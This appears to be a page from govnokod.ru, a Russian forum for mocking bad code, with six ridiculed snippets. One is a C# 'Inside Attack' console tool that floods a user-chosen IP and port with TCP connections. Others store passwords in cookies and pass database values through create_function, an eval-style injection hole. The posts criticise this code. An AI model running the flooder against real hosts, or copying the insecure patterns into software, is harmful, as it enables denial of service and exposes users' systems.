- 1
 - 2
 - 3
 - 4
 
require( "./configuration.php" );
include( "./include.php" );
$returned = @( );
if ( ( $returned ) != @( "harper" ) )
                                    Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
Всего: 6
+75
require( "./configuration.php" );
include( "./include.php" );
$returned = @( );
if ( ( $returned ) != @( "harper" ) )
                                    
+122
<?php
$pictures =new Array(4);
pictures[0]="1.jpg";
pictures[1]="2.png";
pictures[2]="3.jpg";
pictures[3]="4.jpg";
global $i=0;
function Next(){
if($i==3)
$i=0;
else
$i++;
document.getElementById('pic').setAttribute("src", picture[i]);
}
function Prev(){
if($i==0)
$i=3;
else
$i--;
document.getElementById('pic').setAttribute("src", picture[i]);
}
?>
                                    Отличный салат.
+151
$username1=$_COOKIE['username'];
$password1=$_COOKIE['password'];
$username1 = mysql_real_escape_string(stripslashes($_COOKIE['username']));
$password1 = mysql_real_escape_string(stripslashes($_COOKIE['password']));
                                    
+972
private static void Main(string[] args)
{
Label_0000:
    Console.ForegroundColor = ConsoleColor.Green;
    Console.Title = "Inside Attack By XCrackers, Flood And Crash System!!";
    Console.Write("*******************************************************************************\nINSIDE ATTACK , CHECK SYSTEM , FLOOD FIREWALL AND SERVER , CRASH THE SYSTEM\nINSIDE ATTACK , CHECK SYSTEM , FLOOD FIREWALL AND SERVER , CRASH THE SYSTEM\nINSIDE ATTACK , CHECK SYSTEM , FLOOD FIREWALL AND SERVER , CRASH THE SYSTEM\n\n\nBY XCR, AND SYSTEMCHECH GLOBALS\nBY XCR, AND SYSTEMCHECH GLOBALS\nBY XCR, AND SYSTEMCHECH GLOBALS\n\n\nFOR CONTACT:\n\nSKYPE: roeeko10\n\nMSN: [email protected]\n\nSimple, Just Add Me For New UPDATE....\n*******************************************************************************\n\n");
    Console.Write("\n1) Inside.Attack, Flooding\n2) Exit\n\n");
    Console.Write("Your Choise : ");
    switch (int.Parse(Console.ReadLine()))
    {
        case 1:
        {
            Console.Write("\nEnter IP Address : ");
            string ipString = Console.ReadLine();
            Console.Write("\nPort : ");
            int port = int.Parse(Console.ReadLine());
            Console.Write("\nProtocol Tcp/Udp : ");
            Console.ReadLine();
            Console.Write("\nHow Much Request ? : ");
            int num3 = int.Parse(Console.ReadLine());
            byte[] bytes = Encoding.ASCII.GetBytes("abcdefghlkmnopzrstws!!$@$545$%2d21df3s");
            try
            {
                for (int i = 0; i < num3; i++)
                {
                    sck = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(ipString), port);
                    sck.SendTimeout = 1;
                    sck.Connect(remoteEP);
                    sck.SendTo(bytes, remoteEP);
                    Console.WriteLine("[*]Inside.Attack, Syn Request : {0} Data Bytes : 1956 BYTE Every 0.3 Sec ", i);
                }
            }
            catch
            {
                Console.WriteLine("Cannot Connected To The Host ......");
                Console.ReadLine();
            }
            Console.WriteLine("[+]Inside Attack Sucsess.!! All The Syn Request And The Data Byte Was Sent !! <ANT KEY FOR CONTINUE>");
            Console.ReadKey();
            goto Label_0000;
        }
        case 2:
            return;
    }
    Console.Clear();
    Console.WriteLine("Incorrect Choose!! . Please Choose 1/2.\n\n");
    goto Label_0000;
}
                                    Код 13-и летнего кулхацкера. "Это ДДОС посоны".
+150
var a=document.write('<textarea>') ;
document.write(a) ;
                                    
+166
function calc($string){
  $a = create_function("", "return (" . $string . ");" );
  return $a();
}
$query[3] = mysql_query("SELECT * FROM `time`");
while ($fetch = mysql_fetch_array($query[3])) {
  $money = $fetch['money'];
  $money = $money."+0";
  echo calc($money);
}
                                    Не сразу понял что за хрень. В общем это якобы суммирование всех цифр в столбце money...